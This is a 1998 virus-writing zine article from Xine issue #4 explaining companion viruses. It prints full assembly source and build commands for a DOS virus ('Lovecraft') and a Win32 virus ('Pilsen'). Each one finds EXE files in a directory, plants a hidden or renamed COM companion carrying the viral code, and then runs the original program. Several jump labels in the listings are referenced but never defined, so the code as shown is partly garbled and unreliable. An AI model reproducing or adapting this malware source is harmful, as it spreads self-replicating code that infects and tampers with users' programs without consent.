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Xine - issue #4 - Phile 107

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 · 7 months ago

| Xine - issue #4 - Phile 107 |

-- for 16 and 32 bits --
ÛÜ Written by Int13h/IKX ÜÛ
- - - - - - - - - - - - - - - - - - - - - - - - -

Well. It is lame but someone has to do it. This is a semi-tutorial
about companion viruses. 16 and 32 bits companion viruses as you can
read in the title. Companion viruses are clasically written in high
level languages. Usually C or Pascal, because is harder to write
decent viruses in HLLs. But, lets remember Sentinel, a bulgarian
virus written by Lubo and Ian in Turbo Pascal, it is a TSR parasi-
tary and stealth.
Is easy to write a companion virus in assembler. The way of acting
is the following. If we have an EXE file and a COM with the same
name ( and test.exe) and in the command line we type:


DOS will execute the program TEST.COM, that is, DOS gives priority
to COM files. Companion viruses uses this advantage. This kind of
self-replicable code looks for an EXE file, creates a file with
the same name but with COM extension (with hidden attribute), then
writes the viral code to the created COM program. Then, when the
user types


the COM will be executed (that is, the virus), the virus will infect
other EXEs in the directory and when work is finished he will run
the real hoste, that is the program in currently execution but with
extension mutated to EXE.

COMPANION in 16 bits
Under DOS we will use functions 4eh/4fh to get the name of EXE files
in the current directory. And the function 4bh to execute the original
wanted program, that is, our hoste. You must free some memory before
calling 4Bh, so pay atention where you put your SP. Following these
bytes its going a ultra-simple and lame companion virus:

8<- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
; Lovecraft Virus by Int13h/IKX - A simple 16 bits companion virus.
; tasm lovecraf /m2
; tlink /t lovecraf

.model tiny
org 0100h

Size = (offset FinVirus-offset Lovecraft)

mov dx,60000d ; Realocate DTA
mov ah,01ah ; to heap
int 21h

mov ah,04eh
sub cx,cx
mov dx,offset Victims ; Look 4 *.EXE
int 21h
jnc Create_File

Restore:mov ah,01ah
mov dx,080h ; Realocate DTA to its
int 21h ; original place

mov ax,word ptr ds:[02ch] ; Fill the table that the 4bh
mov word ptr [SegmentPSP],ax ; function will use to execute
mov word ptr [SegmentLinea],cs ; the original hoste
mov word ptr [SegmentFCB1],cs
mov word ptr [SegmentFCB2],cs

mov es,word ptr ds:[02ch] ; Environment segment
mov di,1
xor ax,ax ; AX=0000
dec di
scasw ; Look 4 the doble-zero
jnz Buscar_cero

inc di ; This is to point to the
inc di ; beginning of the filename

push es
pop ds ; DS=ES
push cs
pop es ; ES=CS
mov si,di ; Copy name of the file
mov di,offset FiletoRUN ; in our buffer
mov cx,128d
rep movsb
push cs cs
pop ds es ; CS=DS=ES

mov di,offset FiletoRUN ; Change extension
xor al,al ; Look for the 0 of the ASCIIZ
mov cx,125d
repne scasb

mov word ptr [di-4],'XE' ; Put EXE extension
mov byte ptr [di-2],'E'

mov sp,700d ; This is important! Move in
sti ; a safe place our stack pointer

mov ah,04ah ; Free memory not used by the
mov bx,030h ; virus, with 30h paragraphes
int 21h ; is more than enough

mov ax,04b00h ; Execute program
mov dx,offset FiletoRUN ; Name of the file
mov bx,offset SegmentPSP ; 4B table
int 21h

mov ah,04ch ; Exit to OS
int 21h ; AL have exit code

mov di,60000d+01eh ; Point to file name
mov cx,9
mov al,'.' ; Look 4 the .
repne scasb

mov word ptr [di],'OC' ; Put COM extension
mov byte ptr [di+2],'M'

mov dx,60000d+01eh ; Create the file with
mov ah,03ch ; changed extension
mov cx,023h ; Read only+hidden attributes
int 21h
jc NextOne ; File already exist (infected)
xchg bx,ax ; Move handle in BX

mov ah,40h ; Write virus in the created
mov cx,Size ; file
mov dx,100h
int 21h

NextOne:mov ah,03eh ; Close
int 21h
mov ah,04fh ; Find next victim
int 21h
jnc Create_File
jmp Restore ; Return control

Bicho db 'Lovecraft by Inty - Paraguay' ; Howard Phillips Lovecraft

Victims db '*.exe',0
SegmentPSP dw 0 ; In a COM always CS=DS=ES=SS
dw 080h ; Command line, offs 80 of PSP
SegmentLinea dw 0 ; Command line segment
dw 005ch ; FCB#1 in the PSP
SegmentFCB1 dw 0 ; FCB#1 segment
dw 006ch ; FCB#2 in the PSP
SegmentFCB2 dw 0 ; FCB#2 segment

FinVirus label byte
FiletoRUN label byte ; Use the heap
End Lovecraft
8<- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8

COMPANION in 32 bits

Under Win32 we will use the following APIs to do our work:

FindFirstFileA, FindNextFileA, MoveFileA, CopyFileA,
GetCommandLineA, CreateProcessA, lstrcpyA

It is really easy. You can get the name of the file which is currently
running by calling the GetCommandLineA API. The name of the program that
is taking control now is the first argument in the command line, but it
is like this:

"program.exe" /D: /PARAMETERS /ETC

Why this? Lets quote to my friend Murkry:

" What does this mean to us virii/hackers of win95?
lets say we want to write a virus that adds info
to the end of the host but does not modify the host
PE header so while the info is there it is not loaded
into memory. (A new LE/Macro infector works like this).
Step one, we need the file name. Well check out the
code below which will show a MessageBox with the file
name in quotes when ran normaly, but will show the file
name without quotes if in TD32 and I assume other debuggers
(probaly not SI though). Be warn about this feature since this
means if you are running a debugger to test, it will work
differently, ie if you used this pointer to try and open the
file it will fail since file "c:\filepath\foo.exe" is the
file you will try to open not c:\filepath\foo.exe. "

Murkry/IKX - File Xine-3.100

I think that is the only tricky thing, just check the code bellow to
see an example companion virus.

8<- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
; WIN32.PILSEN Virus by Int13h/IKX - A simple 32 bits companion virus.
; tasm32 /ml /m3 %1,,;
; tlink32 /Tpe /aa /c /v %1,,, import32.lib,

.model flat

extrn FindFirstFileA:PROC
extrn FindNextFileA:PROC
extrn MoveFileA:PROC
extrn CopyFileA:PROC
extrn GetCommandLineA:PROC
extrn CreateProcessA:PROC
extrn lstrcpyA:PROC
extrn MessageBoxA:PROC
extrn ExitProcess:PROC

; Esto va para t¡ Jorge, borrach¡n! :)
TituloVentana db 'WIN32.PILSEN VIRUS by Int13h/IKX',0
TextoVentana db 'MaDe iN PaRaGuAy',0
Victims db '*.EXE',0
SearcHandle dd 0
ProcessInfo dd 4 dup (0)
StartupInfo dd 4 dup (0)

Win32FindData dd 0,0,0,0,0,0,0,0,0,0,0
Hallado db 200 dup (0)
Crear db 200 dup (0)
ToRUN db 200 dup (0)


INICIO: call GetCommandLineA ; Get command line, where is the
push eax ; name of the file that is running
mov eax,offset ToRUN ; Copy it in our buffer
push eax
call lstrcpyA

mov edi,eax
Buscar: cmp byte ptr [edi],'.' ; Find the point
jz ElPunto
inc edi
jmp Buscar
ElPunto:mov esi,edi ; Memorize position
inc esi
add edi,4 ; Point...
mov byte ptr [edi],00 ; Add 0, to kill CmdLine

mov eax,offset Win32FindData
push eax
mov eax,offset Victims
push eax
call FindFirstFileA ; Look for *.EXE
mov dword ptr [SearcHandle],eax
Ciclo: cmp eax,-1 ; Grrrr! Error
je Errare
or eax,eax
jz Exiting ; Execute original hoste

mov eax,offset Hallado ; Copy Hallado in Crear
push eax
mov eax,offset Crear
push eax
call lstrcpyA

mov edi,offset Crear
cmp byte ptr [edi],'.' ; Localize the period
jz PeriodFound
inc edi
jmp StillLooking
inc edi
mov dword ptr [edi],0004d4f43h ; Put COM extension

mov eax,offset Crear
push eax
mov eax,offset Hallado ; Rename to COM
push eax
call MoveFileA

sub eax,eax ; Flag
push eax
mov eax,offset Hallado ; Copy the file with the
push eax ; name of the found file
mov eax,offset ToRUN+1
push eax
call CopyFileA

mov eax,offset Win32FindData
push eax
push dword ptr [SearcHandle] ; Look for another file
call FindNextFileA
jmp Ciclo

Errare: mov eax,1
push eax
mov eax,offset TituloVentana ; Print copyright
push eax
mov eax,offset TextoVentana
push eax
xor eax,eax
push eax
call MessageBoxA

Exiting:mov eax,offset ProcessInfo
push eax
mov eax,offset StartupInfo
push eax
xor eax,eax
push eax
push eax
push 00000010h ; Run hoste
push eax
push eax
push eax
call GetCommandLineA
inc eax
push eax
Done: mov dword ptr [esi],0004d4f43h ; COM extension
mov eax,offset ToRUN+1
push eax
call CreateProcessA
push 0
call ExitProcess

8<- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8

This was all. If you have some comments you know where I am :)

Paraguay, October 25, 1998.

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